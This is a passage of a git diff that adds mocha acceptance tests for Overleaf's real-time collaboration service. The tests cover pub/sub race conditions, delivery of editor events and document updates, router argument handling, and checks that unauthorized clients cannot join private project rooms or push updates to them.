MockWebServer.inviteUserToProject( + readWriteProjectId, + { _id: userId }, + 'readAndWrite' + ) + cb(null, { + user_id: userId, + project_id: projectId, + doc_id: docId, + }) + } + ) + }, + hasOwnProject: true, + }, + } + + Object.entries(USER_SETUP).forEach(level0 => { + const [userDescription, userItem] = level0 + let options, client + + const SESSION_SETUP = { + joinReadWriteProject: { + getActions(cb) { + cb(null, [{ connect: readWriteProjectId }]) + }, + needsOwnProject: false, + }, + + joinReadWriteProjectAndDoc: { + getActions(cb) { + cb(null, [ + { connect: readWriteProjectId }, + { rpc: 'joinDoc', args: [readWriteDocId] }, + ]) + }, + needsOwnProject: false, + }, + + joinOwnProject: { + getActions(cb) { + cb(null, [{ connect: options.project_id }]) + }, + needsOwnProject: true, + }, + + joinOwnProjectAndDoc: { + getActions(cb) { + cb(null, [ + { connect: options.project_id }, + { rpc: 'joinDoc', args: [options.doc_id] }, + ]) + }, + needsOwnProject: true, + }, + } + + function performActions(getActions, done) { + getActions((err, actions) => { + if (err) return done(err) + + async.eachSeries( + actions, + (action, next) => { + const cb = (...returnedArgs) => { + const error = returnedArgs.shift() + if (action.fails) { + expect(error).to.exist + expect(returnedArgs).to.have.length(0) + return next() + } + next(error) + } + + if (action.connect) { + client = RealTimeClient.connect(action.connect, cb) + } else if (action.rpc) { + if (client?.socket?.connected) { + client.emit(action.rpc, ...action.args, cb) + } else { + cb(new Error('not connected!')) + } + } else { + next(new Error('unexpected action')) + } + }, + done + ) + }) + } + + describe(userDescription, function () { + beforeEach(function userSetup(done) { + userItem.setup((err, _options) => { + if (err) return done(err) + options = _options + done() + }) + }) + + Object.entries(SESSION_SETUP).forEach(level1 => { + const [sessionSetupDescription, sessionSetupItem] = level1 + const INVALID_REQUESTS = { + noop: { + getActions(cb) { + cb(null, []) + }, + }, + + joinProjectWithBadAccessToken: { + getActions(cb) { + RealTimeClient.setAnonSession( + privateProjectId, + 'invalid-access-token', + err => { + if (err) return cb(err) + cb(null, [ + { + connect: privateProjectId, + fails: 1, + }, + ]) + } + ) + }, + }, + + joinProjectWithDocId: { + getActions(cb) { + cb(null, [ + { + connect: privateDocId, + fails: 1, + }, + ]) + }, + }, + + joinDocWithDocId: { + getActions(cb) { + cb(null, [{ rpc: 'joinDoc', args: [privateDocId], fails: 1 }]) + }, + }, + + joinProjectWithProjectId: { + getActions(cb) { + cb(null, [ + { + connect: privateProjectId, + fails: 1, + }, + ]) + }, + }, + + joinDocWithProjectId: { + getActions(cb) { + cb(null, [{ rpc: 'joinDoc', args: [privateProjectId], fails: 1 }]) + }, + }, + + joinProjectWithProjectIdThenJoinDocWithDocId: { + getActions(cb) { + cb(null, [ + { + connect: privateProjectId, + fails: 1, + }, + { rpc: 'joinDoc', args: [privateDocId], fails: 1 }, + ]) + }, + }, + } + + // skip some areas of the matrix + // - some Users do not have an own project + const skip = sessionSetupItem.needsOwnProject && !userItem.hasOwnProject + + describe(sessionSetupDescription, function () { + beforeEach(function performSessionActions(done) { + if (skip) return this.skip() + performActions(sessionSetupItem.getActions, done) + }) + + Object.entries(INVALID_REQUESTS).forEach(level2 => { + const [InvalidRequestDescription, InvalidRequestItem] = level2 + describe(InvalidRequestDescription, function () { + beforeEach(function performInvalidRequests(done) { + performActions(InvalidRequestItem.getActions, done) + }) + + describe('rooms', function () { + it('should not add the user into the privateProject room', function (done) { + RealTimeClient.getConnectedClient( + client.socket.sessionid, + (error, client) => { + if (error?.message === 'not found') return done() // disconnected + if (error) return done(error) + expect(client.rooms).to.not.include(privateProjectId) + done() + } + ) + }) + + it('should not add the user into the privateDoc room', function (done) { + RealTimeClient.getConnectedClient( + client.socket.sessionid, + (error, client) => { + if (error?.message === 'not found') return done() // disconnected + if (error) return done(error) + expect(client.rooms).to.not.include(privateDocId) + done() + } + ) + }) + }) + + describe('receive updates', function () { + const receivedMessages = [] + beforeEach(function publishAnUpdateInRedis(done) { + const update = { + doc_id: privateDocId, + op: { + meta: { source: privateClient.publicId }, + v: 42, + doc: privateDocId, + op: [{ i: 'foo', p: 50 }], + }, + } + client.on('otUpdateApplied', update => { + receivedMessages.push(update) + }) + privateClient.once('otUpdateApplied', () => { + setTimeout(done, 10) + }) + rclient.publish('applied-ops', JSON.stringify(update)) + }) + + it('should send nothing to client', function () { + expect(receivedMessages).to.have.length(0) + }) + }) + + describe('receive messages from web', function () { + const receivedMessages = [] + beforeEach(function publishAMessageInRedis(done) { + const event = { + room_id: privateProjectId, + message: 'removeEntity', + payload: ['foo', 'convertDocToFile'], + _id: 'web:123', + } + client.on('removeEntity', (...args) => { + receivedMessages.push(args) + }) + privateClient.once('removeEntity', () => { + setTimeout(done, 10) + }) + rclient.publish('editor-events', JSON.stringify(event)) + }) + + it('should send nothing to client', function () { + expect(receivedMessages).to.have.length(0) + }) + }) + + describe('send updates', function () { + let receivedArgs, submittedUpdates, update + + beforeEach(function cleanup(done) { + cleanupPreviousUpdates(privateDocId, done) + }) + + beforeEach(function setupUpdateFields() { + update = { + doc_id: privateDocId, + op: { + v: 43, + lastV: 42, + doc: privateDocId, + op: [{ i: 'foo', p: 50 }], + }, + } + }) + + beforeEach(function sendAsUser(done) { + if (!client?.socket?.connected) { + // disconnected clients cannot emit messages + return this.skip() + } + const userUpdate = Object.assign({}, update, { + hash: 'user', + }) + + client.emit( + 'applyOtUpdate', + privateDocId, + userUpdate, + (...args) => { + receivedArgs = args + done() + } + ) + }) + + beforeEach(function sendAsPrivateUserForReferenceOp(done) { + const privateUpdate = Object.assign({}, update, { + hash: 'private', + }) + + privateClient.emit( + 'applyOtUpdate', + privateDocId, + privateUpdate, + done + ) + }) + + beforeEach(function fetchPendingOps(done) { + getPendingUpdates(privateDocId, (err, updates) => { + submittedUpdates = updates + done(err) + }) + }) + + it('should error out trying to send', function () { + expect(receivedArgs).to.have.length(1) + expect(receivedArgs[0]).to.have.property('message') + // we are using an old version of chai: 1.9.2 + // TypeError: expect(...).to.be.oneOf is not a function + expect( + [ + 'no project_id found on client', + 'not authorized', + ].includes(receivedArgs[0].message) + ).to.equal(true) + }) + + it('should submit the private users message only', function () { + expect(submittedUpdates).to.have.length(1) + const update = JSON.parse(submittedUpdates[0]) + expect(update.hash).to.equal('private') + }) + }) + }) + }) + }) + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/PubSubRace.js b/services/real-time/test/acceptance/js/PubSubRace.js new file mode 100644 index 0000000..07edfb2 --- /dev/null +++ b/services/real-time/test/acceptance/js/PubSubRace.js @@ -0,0 +1,348 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +describe('PubSubRace', function () { + before(function (done) { + return MockDocUpdaterServer.run(done) + }) + + describe('when the client leaves a doc before joinDoc completes', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA.emit('joinDoc', this.doc_id, () => {}) + // leave before joinDoc completes + return this.clientA.emit('leaveDoc', this.doc_id, cb) + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + return it('should not subscribe to the applied-ops channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) + + describe('when the client emits joinDoc and leaveDoc requests frequently and leaves eventually', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + return this.clientA.emit('leaveDoc', this.doc_id, cb) + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + return it('should not subscribe to the applied-ops channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) + + describe('when the client emits joinDoc and leaveDoc requests frequently and remains in the doc', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + this.clientA.emit('joinDoc', this.doc_id, () => {}) + this.clientA.emit('leaveDoc', this.doc_id, () => {}) + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + return it('should subscribe to the applied-ops channels', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) + + return describe('when the client disconnects before joinDoc completes', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + let joinDocCompleted = false + this.clientA.emit( + 'joinDoc', + this.doc_id, + () => (joinDocCompleted = true) + ) + // leave before joinDoc completes + return setTimeout( + () => { + if (joinDocCompleted) { + return cb(new Error('joinDocCompleted -- lower timeout')) + } + this.clientA.on('disconnect', () => cb()) + return this.clientA.disconnect() + }, + // socket.io processes joinDoc and disconnect with different delays: + // - joinDoc goes through two process.nextTick + // - disconnect goes through one process.nextTick + // We have to inject the disconnect event into a different event loop + // cycle. + 3 + ) + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + it('should not subscribe to the editor-events channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`editor-events:${this.project_id}`) + return done() + }) + return null + }) + + return it('should not subscribe to the applied-ops channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/ReceiveEditorEventTests.js b/services/real-time/test/acceptance/js/ReceiveEditorEventTests.js new file mode 100644 index 0000000..7e9fd93 --- /dev/null +++ b/services/real-time/test/acceptance/js/ReceiveEditorEventTests.js @@ -0,0 +1,367 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +describe('receiveEditorEvent', function () { + beforeEach(function (done) { + this.lines = ['test', 'doc', 'lines'] + this.version = 42 + this.ops = ['mock', 'doc', 'ops'] + + /** + * We will set up a project, a doc, and three users: the owner, user 'a' and user 'b' + */ + this.project_id = null + this.doc_id = null + + this.owner_user_id = null + this.owner_client = null + + this.user_a_id = null + this.user_a_client = null + + this.user_b_id = null + this.user_b_client = null + + this.user_c_id = null + this.user_c_client = null + + async.series( + [ + /** + * Create the project, doc, and owner + */ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + userMetadata: { isInvitedMember: true }, + }, + (error, { user_id: userId, project_id: projectId }) => { + if (error) return done(error) + this.owner_user_id = userId + this.project_id = projectId + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + /** + * Connect owner to project/doc + */ + cb => { + this.owner_client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.owner_client.emit('joinDoc', this.doc_id, cb) + }, + + /** + * add user_a to project, as an invited member + */ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + project_id: this.project_id, + userMetadata: { isTokenMember: false, isInvitedMember: true }, + }, + (error, { user_id: userIdSecond }) => { + if (error) return done(error) + this.user_a_id = userIdSecond + return cb() + } + ) + }, + + /** + * Connect user_a to project/doc + */ + cb => { + this.user_a_client = RealTimeClient.connect(this.project_id, cb) + }, + cb => { + return this.user_a_client.emit('joinDoc', this.doc_id, cb) + }, + + /** + * Set up user_b, as a token-access/link-sharing user + */ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + project_id: this.project_id, + userMetadata: { isTokenMember: true, isInvitedMember: false }, + }, + (error, { user_id: userIdThird }) => { + if (error) return done(error) + this.user_b_id = userIdThird + return cb() + } + ) + }, + + /** + * Connect user_b to project/doc + */ + cb => { + this.user_b_client = RealTimeClient.connect(this.project_id, cb) + }, + cb => { + return this.user_b_client.emit('joinDoc', this.doc_id, cb) + }, + + /** + * Set up user_c, as a 'restricted' user (anonymous read-only link-sharing) + */ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + project_id: this.project_id, + userMetadata: { + isTokenMember: false, + isInvitedMember: false, + isRestrictedUser: true, + }, + }, + (error, { user_id: userIdFourth }) => { + if (error) return done(error) + this.user_c_id = userIdFourth + return cb() + } + ) + }, + + /** + * Connect user_c to project/doc + */ + cb => { + this.user_c_client = RealTimeClient.connect(this.project_id, cb) + }, + cb => { + return this.user_c_client.emit('joinDoc', this.doc_id, cb) + }, + + // -------------- + + /** + * Listen for updates + */ + cb => { + this.owner_updates = [] + this.user_a_updates = [] + this.user_b_updates = [] + this.user_c_updates = [] + + const eventNames = [ + 'userRemovedFromProject', + 'project:publicAccessLevel:changed', + 'project:access:revoked', + ] + + for (const eventName of eventNames) { + this.owner_client.on(eventName, update => + this.owner_updates.push({ [eventName]: update }) + ) + this.user_a_client.on(eventName, update => + this.user_a_updates.push({ [eventName]: update }) + ) + this.user_b_client.on(eventName, update => + this.user_b_updates.push({ [eventName]: update }) + ) + this.user_c_client.on(eventName, update => + this.user_c_updates.push({ [eventName]: update }) + ) + } + + return cb() + }, + ], + done + ) + }) + + afterEach(function () { + if (this.owner_client) { + this.owner_client.disconnect() + } + if (this.user_a_client) { + this.user_a_client.disconnect() + } + if (this.user_b_client) { + this.user_b_client.disconnect() + } + if (this.user_c_client) { + this.user_c_client.disconnect() + } + }) + + describe('event: project:publicAccessLevel:changed, set to private', function () { + beforeEach(function (done) { + /** + * We turn off link sharing + */ + rclient.publish( + 'editor-events', + JSON.stringify({ + room_id: this.project_id, + message: 'project:publicAccessLevel:changed', + payload: [{ newAccessLevel: 'private' }], + }) + ) + setTimeout(done, 200) + }) + + it('should disconnect the token-access user, and restricted users', function () { + expect(this.user_b_client.socket.connected).to.equal(false) + expect(this.user_c_client.socket.connected).to.equal(false) + }) + + it('should not disconnect the other users', function () { + expect(this.owner_client.socket.connected).to.equal(true) + expect(this.user_a_client.socket.connected).to.equal(true) + }) + + it('should send the event to the remaining connected clients', function () { + expect(this.owner_updates).to.deep.equal([ + { 'project:publicAccessLevel:changed': { newAccessLevel: 'private' } }, + ]) + + expect(this.user_a_updates).to.deep.equal([ + { 'project:publicAccessLevel:changed': { newAccessLevel: 'private' } }, + ]) + }) + + it('should send a project:access:revoked message to the disconnected clients', function () { + expect(this.user_b_updates).to.deep.equal([ + { 'project:access:revoked': undefined }, + ]) + expect(this.user_c_updates).to.deep.equal([ + { 'project:access:revoked': undefined }, + ]) + }) + }) + + describe('event: project:publicAccessLevel:changed, set to tokenBased', function () { + beforeEach(function (done) { + /** + * We turn on link sharing + */ + rclient.publish( + 'editor-events', + JSON.stringify({ + room_id: this.project_id, + message: 'project:publicAccessLevel:changed', + payload: [{ newAccessLevel: 'tokenBased' }], + }) + ) + setTimeout(done, 200) + }) + + it('should not disconnect anyone', function () { + expect(this.owner_client.socket.connected).to.equal(true) + expect(this.user_a_client.socket.connected).to.equal(true) + expect(this.user_b_client.socket.connected).to.equal(true) + expect(this.user_c_client.socket.connected).to.equal(true) + }) + + it('should send the event to all non-restricted clients', function () { + expect(this.owner_updates).to.deep.equal([ + { + 'project:publicAccessLevel:changed': { newAccessLevel: 'tokenBased' }, + }, + ]) + + expect(this.user_a_updates).to.deep.equal([ + { + 'project:publicAccessLevel:changed': { newAccessLevel: 'tokenBased' }, + }, + ]) + + expect(this.user_b_updates).to.deep.equal([ + { + 'project:publicAccessLevel:changed': { newAccessLevel: 'tokenBased' }, + }, + ]) + // restricted users don't receive this type of message + expect(this.user_c_updates.length).to.equal(0) + }) + }) + + describe('event: userRemovedFromProject', function () { + let removedUserId + beforeEach(function (done) { + /** + * We remove user_a from the project + */ + removedUserId = `${this.user_a_id}` + rclient.publish( + 'editor-events', + JSON.stringify({ + room_id: this.project_id, + message: 'userRemovedFromProject', + payload: [removedUserId], + }) + ) + setTimeout(done, 200) + }) + + it('should disconnect the removed user', function () { + expect(this.user_a_client.socket.connected).to.equal(false) + }) + + it('should not disconnect the other users', function () { + expect(this.owner_client.socket.connected).to.equal(true) + expect(this.user_b_client.socket.connected).to.equal(true) + }) + + it('should send the event to the remaining connected clients', function () { + expect(this.owner_updates).to.deep.equal([ + { userRemovedFromProject: removedUserId }, + ]) + + expect(this.user_b_updates).to.deep.equal([ + { userRemovedFromProject: removedUserId }, + ]) + }) + + it('should send a project:access:revoked message to the disconnected clients', function () { + expect(this.user_a_updates).to.deep.equal([ + { 'project:access:revoked': undefined }, + ]) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/ReceiveUpdateTests.js b/services/real-time/test/acceptance/js/ReceiveUpdateTests.js new file mode 100644 index 0000000..6c7367a --- /dev/null +++ b/services/real-time/test/acceptance/js/ReceiveUpdateTests.js @@ -0,0 +1,312 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockWebServer = require('./helpers/MockWebServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +describe('receiveUpdate', function () { + beforeEach(function (done) { + this.lines = ['test', 'doc', 'lines'] + this.version = 42 + this.ops = ['mock', 'doc', 'ops'] + + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + }, + (error, { user_id: userId, project_id: projectId }) => { + if (error) return done(error) + this.user_id = userId + this.project_id = projectId + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + this.clientB = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return this.clientB.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { name: 'Test Project' }, + }, + (error, { user_id: userIdSecond, project_id: projectIdSecond }) => { + if (error) return done(error) + this.user_id_second = userIdSecond + this.project_id_second = projectIdSecond + return cb() + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id_second, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docIdSecond }) => { + this.doc_id_second = docIdSecond + return cb(e) + } + ) + }, + + cb => { + this.clientC = RealTimeClient.connect(this.project_id_second, cb) + }, + + cb => { + return this.clientC.emit('joinDoc', this.doc_id_second, cb) + }, + + cb => { + this.clientAUpdates = [] + this.clientA.on('otUpdateApplied', update => + this.clientAUpdates.push(update) + ) + this.clientBUpdates = [] + this.clientB.on('otUpdateApplied', update => + this.clientBUpdates.push(update) + ) + this.clientCUpdates = [] + this.clientC.on('otUpdateApplied', update => + this.clientCUpdates.push(update) + ) + + this.clientAErrors = [] + this.clientA.on('otUpdateError', error => + this.clientAErrors.push(error) + ) + this.clientBErrors = [] + this.clientB.on('otUpdateError', error => + this.clientBErrors.push(error) + ) + this.clientCErrors = [] + this.clientC.on('otUpdateError', error => + this.clientCErrors.push(error) + ) + return cb() + }, + ], + done + ) + }) + + afterEach(function () { + if (this.clientA != null) { + this.clientA.disconnect() + } + if (this.clientB != null) { + this.clientB.disconnect() + } + return this.clientC != null ? this.clientC.disconnect() : undefined + }) + + describe('with an update from clientA', function () { + beforeEach(function (done) { + this.update = { + doc_id: this.doc_id, + op: { + meta: { + source: this.clientA.publicId, + }, + v: this.version, + doc: this.doc_id, + op: [{ i: 'foo', p: 50 }], + }, + } + rclient.publish('applied-ops', JSON.stringify(this.update)) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should send the full op to clientB', function () { + return this.clientBUpdates.should.deep.equal([this.update.op]) + }) + + it('should send an ack to clientA', function () { + return this.clientAUpdates.should.deep.equal([ + { + v: this.version, + doc: this.doc_id, + }, + ]) + }) + + return it('should send nothing to clientC', function () { + return this.clientCUpdates.should.deep.equal([]) + }) + }) + + describe('with an update from clientC', function () { + beforeEach(function (done) { + this.update = { + doc_id: this.doc_id_second, + op: { + meta: { + source: this.clientC.publicId, + }, + v: this.version, + doc: this.doc_id_second, + op: [{ i: 'update from clientC', p: 50 }], + }, + } + rclient.publish('applied-ops', JSON.stringify(this.update)) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should send nothing to clientA', function () { + return this.clientAUpdates.should.deep.equal([]) + }) + + it('should send nothing to clientB', function () { + return this.clientBUpdates.should.deep.equal([]) + }) + + return it('should send an ack to clientC', function () { + return this.clientCUpdates.should.deep.equal([ + { + v: this.version, + doc: this.doc_id_second, + }, + ]) + }) + }) + + describe('with an update from a remote client for project 1', function () { + beforeEach(function (done) { + this.update = { + doc_id: this.doc_id, + op: { + meta: { + source: 'this-is-a-remote-client-id', + }, + v: this.version, + doc: this.doc_id, + op: [{ i: 'foo', p: 50 }], + }, + } + rclient.publish('applied-ops', JSON.stringify(this.update)) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should send the full op to clientA', function () { + return this.clientAUpdates.should.deep.equal([this.update.op]) + }) + + it('should send the full op to clientB', function () { + return this.clientBUpdates.should.deep.equal([this.update.op]) + }) + + return it('should send nothing to clientC', function () { + return this.clientCUpdates.should.deep.equal([]) + }) + }) + + describe('with an error for the first project', function () { + beforeEach(function (done) { + rclient.publish( + 'applied-ops', + JSON.stringify({ + doc_id: this.doc_id, + error: (this.error = 'something went wrong'), + }) + ) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should send the error to the clients in the first project', function () { + this.clientAErrors.should.deep.equal([this.error]) + return this.clientBErrors.should.deep.equal([this.error]) + }) + + it('should not send any errors to the client in the second project', function () { + return this.clientCErrors.should.deep.equal([]) + }) + + it('should disconnect the clients of the first project', function () { + this.clientA.socket.connected.should.equal(false) + return this.clientB.socket.connected.should.equal(false) + }) + + return it('should not disconnect the client in the second project', function () { + return this.clientC.socket.connected.should.equal(true) + }) + }) + + return describe('with an error for the second project', function () { + beforeEach(function (done) { + rclient.publish( + 'applied-ops', + JSON.stringify({ + doc_id: this.doc_id_second, + error: (this.error = 'something went wrong'), + }) + ) + return setTimeout(done, 200) + }) // Give clients time to get message + + it('should not send any errors to the clients in the first project', function () { + this.clientAErrors.should.deep.equal([]) + return this.clientBErrors.should.deep.equal([]) + }) + + it('should send the error to the client in the second project', function () { + return this.clientCErrors.should.deep.equal([this.error]) + }) + + it('should not disconnect the clients of the first project', function () { + this.clientA.socket.connected.should.equal(true) + return this.clientB.socket.connected.should.equal(true) + }) + + return it('should disconnect the client in the second project', function () { + return this.clientC.socket.connected.should.equal(false) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/RouterTests.js b/services/real-time/test/acceptance/js/RouterTests.js new file mode 100644 index 0000000..e3493a6 --- /dev/null +++ b/services/real-time/test/acceptance/js/RouterTests.js @@ -0,0 +1,105 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const async = require('async') +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +describe('Router', function () { + return describe('joinProject', function () { + describe('when there is no callback provided', function () { + after(function () { + return process.removeListener('unhandledRejection', this.onUnhandled) + }) + + before(function (done) { + this.onUnhandled = error => done(error) + process.on('unhandledRejection', this.onUnhandled) + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + return it('should keep on going', function () { + return expect('still running').to.exist + }) + }) + + return describe('when there are too many arguments', function () { + after(function () { + return process.removeListener('unhandledRejection', this.onUnhandled) + }) + + before(function (done) { + this.onUnhandled = error => done(error) + process.on('unhandledRejection', this.onUnhandled) + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', 1, 2, 3, 4, 5, error => { + this.error = error + return cb() + }) + }, + ], + done + ) + }) + + return it('should return an error message', function () { + return expect(this.error.message).to.equal('unexpected arguments') + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/SessionSocketsTests.js b/services/real-time/test/acceptance/js/SessionSocketsTests.js new file mode 100644 index 0000000..cca7f75 --- /dev/null +++ 